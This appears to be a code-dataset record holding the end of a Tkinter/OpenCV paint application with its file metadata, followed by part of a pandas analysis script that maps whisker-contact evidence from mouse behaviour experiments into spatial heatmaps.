self.translateimg_button.place(x=5,y=190)\r\n\r\n\r\n self.bigger_logo = ImageTk.PhotoImage(Image.open('bigger.png').resize((30,30)))\r\n self.biggerimg = Label(self.paint_tools, text='Bigger',font=('verdana',10,'bold'))\r\n self.biggerimg.place(x=50,y=225)\r\n self.biggerimg_button = Button(self.paint_tools,image = self.bigger_logo,borderwidth=2,command=self.scale_bigger)\r\n 
self.biggerimg_button.place(x=5,y=220)\r\n \r\n self.smaller_logo = ImageTk.PhotoImage(Image.open('smaller.png').resize((30,30)))\r\n self.smallerimg = Label(self.paint_tools, text='Smaller',font=('verdana',10,'bold'))\r\n self.smallerimg.place(x=50,y=255)\r\n self.smallerimg_button = Button(self.paint_tools,image = self.smaller_logo,borderwidth=2,command=self.scale_smaller)\r\n self.smallerimg_button.place(x=5,y=250)\r\n\r\n self.skew_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.skewimg = Label(self.paint_tools, text='Skew',font=('verdana',10,'bold'))\r\n self.skewimg.place(x=50,y=285)\r\n self.skewimg_button = Button(self.paint_tools,image = self.skew_logo,borderwidth=2,command=self.skew)\r\n self.skewimg_button.place(x=5,y=280)\r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='wrapx',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=315)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.wrapx)\r\n self.saveimg_button.place(x=5,y=310)\r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='wrapy',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=345)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.wrapy)\r\n self.saveimg_button.place(x=5,y=340)\r\n \r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='save',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=375)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.save_action)\r\n self.saveimg_button.place(x=5,y=370)\r\n \r\n \r\n self.pen_size = Label(self.paint_tools,text=\"Brush Size\",font=('verdana',10,'bold'))\r\n self.pen_size.place(x=15,y=520)\r\n self.choose_size_button = Scale(self.paint_tools, from_=1, to=20, orient=VERTICAL)\r\n self.choose_size_button.place(x=20,y=420)\r\n \r\n\r\n self.c = Canvas(self.root ,height=1000,width=1000)\r\n self.c.place(x=250,y=0)\r\n\r\n self.setup()\r\n self.root.mainloop()\r\n\r\n def setup(self):\r\n self.old_x = None\r\n self.old_y = None\r\n self.c.create_image(100,100,anchor=NW,image=self.img)\r\n self.c.image = self.img \r\n self.line_width = self.choose_size_button.get()\r\n self.color_code = self.DEFAULT_COLOR\r\n self.erase = False\r\n self.active_button = self.brush_button\r\n \r\n # self.c.bind('', self.paint)\r\n # self.c.bind('', self.reset)\r\n\r\n # def use_pen(self):\r\n # self.activate_button(self.pen_button)\r\n\r\n # def use_brush(self):\r\n # self.activate_button(self.brush_button)\r\n\r\n # def choose_color(self):\r\n # self.eraser_on = False\r\n # self.color = askcolor(color=self.color)[1]\r\n\r\n # de f use_eraser(self):\r\n # self.activate_button(self.eraser_button, eraser_mode=True)\r\n\r\n # def activate_button(self, some_button, eraser_mode=False):\r\n # self.active_button.config(relief=RAISED)\r\n # some_button.config(relief=SUNKEN)\r\n # self.active_button = some_button\r\n # self.eraser_on = eraser_mode\r\n\r\n # def paint(self, event):\r\n # self.line_width = self.choose_size_button.get()\r\n # paint_color = 'white' if self.eraser_on else self.color\r\n # if self.old_x and self.old_y:\r\n # self.c.create_line(self.old_x, self.old_y, event.x, event.y,\r\n # width=self.line_width, fill=paint_color,\r\n # 
capstyle=ROUND, smooth=TRUE, splinesteps=36)\r\n # self.old_x = event.x\r\n # self.old_y = event.y\r\n def erasef(self):\r\n self.erase=True\r\n \r\n def draw_action(self):\r\n self.c.bind(\"\", self.start_draw)\r\n self.c.bind(\"\", self.draw)\r\n\r\n def choose_color(self):\r\n self.color_code = askcolor(color=self.color_code)[1]\r\n\r\n def start_draw(self, event):\r\n self.x = event.x\r\n self.y = event.y\r\n self.draw_ids = []\r\n \r\n \r\n def draw(self, event):\r\n # print(self.draw_ids)\r\n if self.erase:\r\n self.line_width = self.choose_size_button.get()\r\n self.draw_ids.append(self.c.create_line(self.x, self.y, event.x, event.y, width=self.line_width,\r\n fill='#ffffff', capstyle=ROUND, smooth=True))\r\n cv2.line(self.filtered_image, (int(self.x * self.ratio), int(self.y * self.ratio)),\r\n (int(event.x * self.ratio), int(event.y * self.ratio)),\r\n (255,255,255) , thickness=self.line_width,\r\n lineType=8)\r\n self.x = event.x\r\n self.y = event.y\r\n else:\r\n self.line_width = self.choose_size_button.get()\r\n self.draw_ids.append(self.c.create_line(self.x, self.y, event.x, event.y, width=self.line_width,\r\n fill=self.color_code, capstyle=ROUND, smooth=True))\r\n RGB = ImageColor.getcolor(self.color_code,'RGB')\r\n R= RGB[0]\r\n G= RGB[1]\r\n B= RGB[2]\r\n cv2.line(self.filtered_image, (int(self.x * self.ratio), int(self.y * self.ratio)),\r\n (int(event.x * self.ratio), int(event.y * self.ratio)),\r\n (B,G,R) , thickness=self.line_width,\r\n lineType=8)\r\n self.x = event.x\r\n self.y = event.y\r\n \r\n # def refresh_side_frame(self):\r\n # try:\r\n # self.side_frame.grid_forget()\r\n # except:\r\n # pass\r\n # self.c.unbind(\"\")\r\n # self.c.unbind(\"\")\r\n # self.c.unbind(\"\")\r\n # self.display_image(self.filtered_image)\r\n # self.side_frame = self.brush_button.Frame(self.frame_menu)\r\n # self.side_frame.grid(row=0, column=4, rowspan=10)\r\n # self.side_frame.config(relief=GROOVE, padding=(50, 15))\r\n \r\n \r\n def upload_action(self):\r\n self.c.delete(\"all\")\r\n self.filename = filedialog.askopenfilename()\r\n self.original_image = cv2.imread(self.filename)\r\n self.edited_image = cv2.imread(self.filename)\r\n self.filtered_image = cv2.imread(self.filename)\r\n self.display_image(self.edited_image)\r\n \r\n \r\n def rotate_left_action(self):\r\n self.filtered_image = cv2.rotate(\r\n self.filtered_image, cv2.ROTATE_90_COUNTERCLOCKWISE)\r\n self.display_image(self.filtered_image)\r\n\r\n\r\n def rotate_right_action(self):\r\n self.filtered_image = cv2.rotate(\r\n self.filtered_image, cv2.ROTATE_90_CLOCKWISE)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def scale_smaller(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 0.8, fy = 0.8)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def wrapx(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1.2, fy = 1)\r\n self.display_image(self.filtered_image)\r\n \r\n def wrapy(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1, fy = 1.2)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n \r\n \r\n def scale_bigger(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1.2, fy = 1.2)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def translate(self):\r\n \r\n height, width = 
self.filtered_image.shape[:2]\r\n quarter_height, quarter_width = height / 4, width / 4\r\n T = np.float32([[1, 0, quarter_width], [0, 1, quarter_height]])\r\n self.filtered_image = cv2.warpAffine(self.filtered_image, T, (width, height))\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def skew(self):\r\n rows, cols,c= self.filtered_image.shape\r\n M = np.float32([[1, 0.5, 0],\r\n \t[0, 1 , 0],\r\n \t[0, 0 , 1]]) \r\n self.filtered_image = cv2.warpPerspective(self.filtered_image,M,(int(cols*1.5),int(rows*1.5)))\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def display_image(self, image=None):\r\n self.c.delete(\"all\")\r\n if image is None:\r\n image = self.edited_image.copy()\r\n else:\r\n image = image\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n height, width , channel = image.shape\r\n ratio = height / width\r\n\r\n new_width = width\r\n new_height = height\r\n\r\n # if height > 400 or width > 300:\r\n # if ratio < 1:\r\n # new_width = 300\r\n # new_height = int(new_width * ratio)\r\n # else:\r\n # new_height = 400\r\n # new_width = int(new_height * (width / height))\r\n\r\n self.ratio = height / new_height\r\n self.new_image = cv2.resize(image, (new_width, new_height))\r\n\r\n self.new_image = ImageTk.PhotoImage(\r\n Image.fromarray(self.new_image))\r\n\r\n self.c.config(width=new_width, height=new_height)\r\n self.c.create_image(\r\n new_width / 2, new_height / 2, image=self.new_image)\r\n \r\n def save_action(self):\r\n original_file_type = self.filename.split('.')[-1]\r\n filename = filedialog.asksaveasfilename()\r\n filename = filename + \".\" + original_file_type\r\n\r\n save_as_image = self.filtered_image\r\n cv2.imwrite(filename, save_as_image)\r\n self.filename = filename\r\n \r\n # def reset(self, event):\r\n # self.old_x, self.old_y = None, None\r\n\r\nPaint()", "repo_name": "Ribal-Dahdal/Paint-App", "sub_path": "paint.py", "file_name": "paint.py", "file_ext": "py", "file_size_in_byte": 14276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.ImageTk.PhotoImage", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 45, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 45, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 51, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 51, "usage_type": "name"}, 
{"api_name": "PIL.ImageTk.PhotoImage", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 82, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 82, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 94, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 94, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 101, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 101, "usage_type": "name"}, {"api_name": "tkinter.colorchooser.askcolor", "line_number": 169, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 183, "usage_type": "call"}, {"api_name": "PIL.ImageColor.getcolor", "line_number": 193, "usage_type": "call"}, {"api_name": "PIL.ImageColor", "line_number": 193, "usage_type": "name"}, {"api_name": "cv2.line", "line_number": 197, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 220, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 220, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 222, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 223, "usage_type": "call"}, {"api_name": "cv2.rotate", "line_number": 228, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_COUNTERCLOCKWISE", "line_number": 229, "usage_type": "attribute"}, {"api_name": "cv2.rotate", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_CLOCKWISE", "line_number": 235, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 247, 
"usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 268, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 275, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 278, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 288, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 288, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 304, "usage_type": "call"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 306, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 306, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 307, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 307, "usage_type": "name"}, {"api_name": "tkinter.filedialog.asksaveasfilename", "line_number": 315, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 315, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 319, "usage_type": "call"}]}
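The draw() handler in the Paint record above converts Tk's '#rrggbb' colour string (RGB channel order) with ImageColor.getcolor and then reverses the channels, because OpenCV's drawing functions expect BGR. A self-contained sketch of just that conversion, with an invented white canvas as the target image.

import cv2
import numpy as np
from PIL import ImageColor

def draw_line_bgr(image, p0, p1, hex_color, thickness=3):
    # Tk/PIL colours are RGB; cv2.line expects BGR, so reverse the channels.
    r, g, b = ImageColor.getcolor(hex_color, 'RGB')
    cv2.line(image, p0, p1, (b, g, r), thickness=thickness, lineType=8)

canvas = np.full((100, 100, 3), 255, dtype=np.uint8)   # white 100x100 image
draw_line_bgr(canvas, (10, 10), (90, 90), '#ff0000')   # red: RGB (255,0,0) -> BGR (0,0,255)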
+{"seq_id": "71343659047", "text": "## Heatmap the contacts and anti-contacts in the warped plot by their evidence\n\n# Uses data:\n# big_weights_part\n# reduced_model_results_sbrc/no_opto/contact_binarized+anti_contact_count+angle+anti_angle_max\n\n\n\"\"\"\n4A, bottom; S4A, bottom\n PLOT_EDGE_SUMMARY_ONLY\n Image of the different shape positions in the consensus space\n\n4B\n PLOT_OCCUPANCY_DISCONLY\n Locations of whisks with contact and whisks without contact\n\n4C; S4B\n PLOT_EVIDENCE_DISCONLY_REWSIDEONLY\n Evidence for stimulus in both whisks with and without contact\n\nS4C\n PLOT_EVIDENCE_DISCONLY_CHOICEONLY\n Evidence for choice in both whisks with and without contact\n\"\"\"\n\nimport json\nimport os\nimport pandas\nimport numpy as np\nimport my.plot \nimport matplotlib.pyplot as plt\nimport matplotlib\nimport extras\n\n\n## Plot flags\nmy.plot.manuscript_defaults()\nmy.plot.font_embed()\n\n\n## Parameters\nwith open('../parameters') as fi:\n params = json.load(fi)\n \n \n## Load metadata about sessions\nsession_df, task2mouse, mouse2task = my.dataload.load_session_metadata(params)\nbig_tm = pandas.read_pickle(os.path.join(params['patterns_dir'], 'big_tm'))\n\n# Insert mouse and task levels into big_tm\nbig_tm = my.misc.insert_mouse_and_task_levels(\n big_tm, mouse2task, level=0, sort=True)\n\n# Count the number of trials per session\nn_trials_per_session = big_tm.groupby(['task', 'mouse', 'session']).size()\n\n# Count the number of trials per mouse\nn_trials_per_mouse = n_trials_per_session.sum(level=['task', 'mouse'])\n\n\n## Load warping data\ntransformation_df = pandas.read_pickle(\n os.path.join(params['scaling_dir'], 'transformation_df'))\nconsensus_edge_summary = pandas.read_pickle(\n os.path.join(params['scaling_dir'], 'consensus_edge_summary'))\n\n# ces to plot\ncv_ces = consensus_edge_summary.xs(50, level='stepper_pos').max(level='row')\ncc_ces = consensus_edge_summary.xs(150, level='stepper_pos').max(level='row')\nall_ces = consensus_edge_summary.max(level='row')\n\n# fillna for transparent plotting\ncv_ces[cv_ces == 0] = np.nan\ncc_ces[cc_ces == 0] = np.nan\nall_ces[all_ces == 0] = np.nan\n\n\n## Load data\nC2_whisk_cycles = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'big_C2_tip_whisk_cycles'))\nbig_cycle_features = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'big_cycle_features'))\n\n# This is just to plot follicle position\nmean_follicle = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'mean_follicle'))\n\n# Transform follicle\ntransformed_mean_follicle = my.misc.transform(\n mean_follicle, transformation_df).mean(level='whisker')\n\n\n## Load the original features for plotting\n# Need the original bins ('analysis_bin') to interpret the weights\nouf = pandas.read_pickle(os.path.join(params['logreg_dir'], \n 'obliviated_unaggregated_features_with_bin'))\n\n# Insert mouse and task levels into features\nouf = my.misc.insert_mouse_and_task_levels(\n ouf, mouse2task, level=0, sort=True)\n\n# Add a new bin for this analysis\nbin_edges_frames = np.linspace(-300, 100, 5)\nbin_centers_frames = (bin_edges_frames[1:] + bin_edges_frames[:-1]) / 2.0\nbin_ser = pandas.cut(\n C2_whisk_cycles['peak_frame_wrt_rwin'],\n bin_edges_frames, labels=False, right=True).rename('bin')\n\n# Append bin_ser to index\nidxdf = ouf.index.to_frame().reset_index(drop=True)\nidxdf = idxdf.join(bin_ser, on=['session', 'trial', 'cycle'])\nidxdf['bin'] = idxdf['bin'].fillna(-1).astype(np.int)\nouf.index = pandas.MultiIndex.from_frame(idxdf)\n\n# Drop null bins 
and reorder levels\nouf = ouf.drop(-1, level='bin')\nouf = ouf.reorder_levels(\n ['task', 'mouse', 'session', 'trial', 'bin', 'analysis_bin', 'cycle']\n ).sort_index()\n\n# Extract features of interest\ncontact_binarized = ouf['contact_binarized']\nanti_contact_count = ouf['anti_contact_count']\n\n\n## Load results of main2a1\nbig_weights_part = pandas.read_pickle('big_weights_part')\n\n# Choose the reduced_model\nreduced_model = 'contact_binarized+anti_contact_count+angle+anti_angle_max'\n\n# Use these weights\nuse_weights = big_weights_part[False]['no_opto'][reduced_model]\n\n# normalizing stuff for features that aren't raw\nnormalizing_mu = pandas.read_pickle(os.path.join(\n params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model, \n 'big_normalizing_mu'))\nnormalizing_sigma = pandas.read_pickle(os.path.join(\n params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model, \n 'big_normalizing_sigma'))\n\n# Remove redundant\nnormalizing_mu = normalizing_mu.xs(\n 'rewside', level='decode_label').rename('mu').copy()\nnormalizing_sigma = normalizing_sigma.xs(\n 'rewside', level='decode_label').rename('sigma').copy()\n\n\n## Extract the locations of each contact, to be weighted by weights\n# Extract contact presence and angle onto the columns, one row per contact\nstacked_contacts = ouf[\n ['anti_angle_max', 'anti_contact_count', 'contact_binarized', 'angle']\n ].stack('label')\n\n# Drop the rows that have neither anti- nor actual contact\nstacked_contacts = stacked_contacts.loc[\n (stacked_contacts['anti_contact_count'] != 0) |\n (stacked_contacts['contact_binarized'] != 0)\n ].copy()\n\n# Join on whisk location (this is where it will be plotted)\n# TODO: join on contact location, not peak location, but probably the same\nto_join = big_cycle_features[\n ['peak_tip_x', 'peak_tip_y']].stack('whisker')\nto_join.index = to_join.index.rename('label', level='whisker')\nstacked_contacts = stacked_contacts.join(\n to_join, on=['session', 'trial', 'cycle', 'label']).sort_index()\nassert not stacked_contacts.index.duplicated().any()\n\n\n## Apply the standardization to the non-raw features\n# Only standardize these\nstandardized_features = ['anti_angle_max', 'angle']\n\n# Extract and join on sigma and mu\nto_standardize = stacked_contacts[\n standardized_features].stack().rename('value').to_frame()\nto_standardize = to_standardize.join(\n normalizing_mu,\n on=['session', 'metric', 'label', 'analysis_bin']\n )\nto_standardize = to_standardize.join(\n normalizing_sigma,\n on=['session', 'metric', 'label', 'analysis_bin']\n )\nto_standardize['standardized'] = to_standardize['value'].sub(\n to_standardize['mu']).divide(to_standardize['sigma'])\n\n# Drop ones that go to infinity\nto_standardize = to_standardize.loc[\n ~np.isinf(to_standardize['standardized']) &\n ~to_standardize['standardized'].isnull() &\n (to_standardize['standardized'].abs() < 10)\n ]\n\n# Put back into stacked_contacts\n# This will insert nulls where standardized angle was messed up\nto_rejoin = to_standardize['standardized'].unstack('metric')\nstacked_contacts = stacked_contacts.drop(standardized_features, axis=1)\nstacked_contacts = stacked_contacts.join(to_rejoin)\n\n\n## Transform contact location into the warped space\nto_transform = stacked_contacts[['peak_tip_x', 'peak_tip_y']]\ntransformed_contacts = my.misc.transform(\n to_transform, transformation_df).rename(\n columns={'peak_tip_x': 'transformed_x', 'peak_tip_y': 'transformed_y'})\n\n\n## Calculate the evidence of each contact\n# Stack 
contacts again, so that each metric (e.g. angle) is a row\nto_weight = stacked_contacts[\n ['anti_contact_count', 'contact_binarized', 'angle', 'anti_angle_max']\n ].stack().rename('value')\n\n# Get decode_label alone on columns\nflattened_weights = use_weights.stack().stack().stack().unstack('decode_label')\n\n# Rename weights\nflattened_weights = flattened_weights.rename(\n columns={'choice': 'choice_weight', 'rewside': 'rewside_weight'})\n\n# Join the weights onto the contacts\njoined = to_weight.to_frame().join(\n flattened_weights, on=flattened_weights.index.names)\n#~ assert not joined.isnull().any().any()\nassert len(joined) == len(to_weight)\n\n# Shouldn't be any nulls because they would have been dropped by stacking\n#~ assert not joined.isnull().any().any()\n\n# Apply weight\njoined['choice_evidence'] = joined['value'] * joined['choice_weight']\njoined['rewside_evidence'] = joined['value'] * joined['rewside_weight']\nevidence = joined[['choice_evidence', 'rewside_evidence']].copy()\n\n# Sum over metric\nevidence = evidence.sum(\n level=[lev for lev in evidence.index.names if lev != 'metric']\n )\n\n\n## Concat data about contacts, their transformed position, and their evidence\ncontact_evidence = pandas.concat(\n [stacked_contacts, transformed_contacts, evidence], \n axis=1, sort=True, verify_integrity=True).sort_index(axis=1)\n\n\n## Bin the contacts spatially\n# How to bin\nbins_x = np.linspace(-300, 300, 26)\nbincenters_x = (bins_x[1:] + bins_x[:-1]) / 2.0\nbins_y = np.linspace(-200, 400, 26)\nbincenters_y = (bins_y[1:] + bins_y[:-1]) / 2.0\n\n# Histogram the points\ncontact_evidence['bin_x'] = pandas.cut(\n contact_evidence['transformed_x'],\n bins=bins_x,\n labels=False, right=True)\ncontact_evidence['bin_y'] = pandas.cut(\n contact_evidence['transformed_y'],\n bins=bins_y,\n labels=False, right=True)\n\n# Drop ones outside bins\n# TODO: check this doesn't happen too much\ncontact_evidence = contact_evidence.dropna(subset=['bin_x', 'bin_y'])\ncontact_evidence['bin_x'] = contact_evidence['bin_x'].astype(np.int)\ncontact_evidence['bin_y'] = contact_evidence['bin_y'].astype(np.int)\n\n# This is used to reindex various quantities below to evenly tile the frame\nfull_spatial_bincenter_midx = pandas.MultiIndex.from_product([\n pandas.Index(range(len(bincenters_x)), name='bin_x'),\n pandas.Index(range(len(bincenters_y)), name='bin_y'),\n ], names=['bin_x', 'bin_y'])\n\n\n## Rename label to whisker\ncontact_evidence.index = contact_evidence.index.rename('whisker', level='label')\n\n\n## Drop C0 for now\ncontact_evidence = contact_evidence.drop('C0', level='whisker')\n\n\n## Split the evidence by contact vs no-contact whisks\n# A contact occurred\nyes_contact_evidence = contact_evidence.loc[\n (contact_evidence['contact_binarized'] > 0) &\n (contact_evidence['anti_contact_count'] == 0)\n ]\n\n# No contact occurred\nnon_contact_evidence = contact_evidence.loc[\n (contact_evidence['contact_binarized'] == 0) &\n (contact_evidence['anti_contact_count'] > 0)\n ]\n\n# On ~1.5% of whisks some double pump happened where both a contact \n# and an anti-contact happened on the same whisker\n# Those are dropped\n\n# Add this as a level\ncontact_evidence = pandas.concat([\n yes_contact_evidence, non_contact_evidence],\n axis=0, sort=True, verify_integrity=True, keys=['yes', 'non'], \n names=['contact_typ'])\n\n\n## Aggregate the evidence by spatial bins\n# Mean evidence\ngobj = contact_evidence.groupby(\n ['contact_typ', 'task', 'mouse', 'whisker', 'bin_x', 'bin_y'])\naggregated_evidence_spatial 
= gobj[\n ['choice_evidence', 'rewside_evidence']].mean()\n\n# Count the number of whisks that went into this mean\nn_whisks = gobj.size().rename('n_whisks')\nassert n_whisks.sum() == len(contact_evidence)\naggregated_evidence_spatial = aggregated_evidence_spatial.join(n_whisks)\n\n# Calculate whisks per trial in each bin\n# This is more appropriate for comparing across conditions\naggregated_evidence_spatial['n_whisks_per_trial'] = (\n aggregated_evidence_spatial['n_whisks'].divide(\n n_trials_per_mouse)).reorder_levels(\n aggregated_evidence_spatial.index.names)\n\n# Also normalize this, so that it sums to 1 over all spatial bins\n# This is more appropriate for just looking at relative spatial distributions\nnormalizing_factor = aggregated_evidence_spatial['n_whisks'].sum(\n level=[lev for lev in aggregated_evidence_spatial.index.names \n if lev not in ['bin_x', 'bin_y']])\naggregated_evidence_spatial['norm_whisks_per_trial'] = (\n aggregated_evidence_spatial['n_whisks'].divide(\n normalizing_factor).reorder_levels(\n aggregated_evidence_spatial.index.names)\n )\n\n\n## Aggregate the evidence by spatiotemporal bins\n## TODO: normalize like above\n# Mean evidence\ngobj = contact_evidence.groupby(\n ['contact_typ', 'task', 'mouse', 'bin', 'whisker', 'bin_x', 'bin_y'])\naggregated_evidence_spatiotemporal = gobj[\n ['choice_evidence', 'rewside_evidence']].mean()\n\n# Sum occupancy\noccupancy = gobj.size().rename('n_contacts')\nassert occupancy.sum() == len(contact_evidence)\naggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.join(occupancy)\n\n# Normalize the occupancy to sum to 1 over the spatial bins\ncontacts_per_bin = aggregated_evidence_spatiotemporal['n_contacts'].sum(\n level=[lev for lev in aggregated_evidence_spatiotemporal.index.names \n if lev not in ['bin_x', 'bin_y']])\naggregated_evidence_spatiotemporal['occupancy'] = aggregated_evidence_spatiotemporal['n_contacts'].divide(\n contacts_per_bin).reorder_levels(aggregated_evidence_spatiotemporal.index.names)\n\n# Replace bin with bincenter\nidxdf = aggregated_evidence_spatiotemporal.index.to_frame().reset_index(drop=True)\nidxdf['frame_bin'] = idxdf['bin'].map(\n pandas.Series(bin_centers_frames, index=range(len(bin_centers_frames))))\naggregated_evidence_spatiotemporal.index = pandas.MultiIndex.from_frame(\n idxdf[['contact_typ', 'task', 'mouse', 'frame_bin', \n 'whisker', 'bin_x', 'bin_y']])\naggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.sort_index()\n\n\n## Plot flags\nPLOT_EDGE_SUMMARY_ONLY = True\nPLOT_OCCUPANCY_DISCONLY = True\nPLOT_EVIDENCE_DISCONLY_REWSIDEONLY = True\nPLOT_EVIDENCE_DISCONLY_CHOICEONLY = True\n\n\n## Plot\nif PLOT_EDGE_SUMMARY_ONLY:\n ## Simple single axis with edge summary, for demonstration\n # Figure handle\n f, ax = plt.subplots(figsize=(3, 2.5))\n f.subplots_adjust(left=0, right=1, bottom=0, top=1)\n \n # Plot edge summary\n extras.plot_warped_edge_summary(\n ax, cv_ces=cv_ces, cc_ces=cc_ces, typ='color_by_stimulus')\n\n # Follicle\n ax.plot(\n [transformed_mean_follicle['x'].values.mean()],\n [transformed_mean_follicle['y'].values.mean()],\n marker='x', color='k', ls='none')\n\n # Pretty\n ax.axis('image')\n ax.set_xlim((-300, 300))\n ax.set_ylim((300, -200))\n 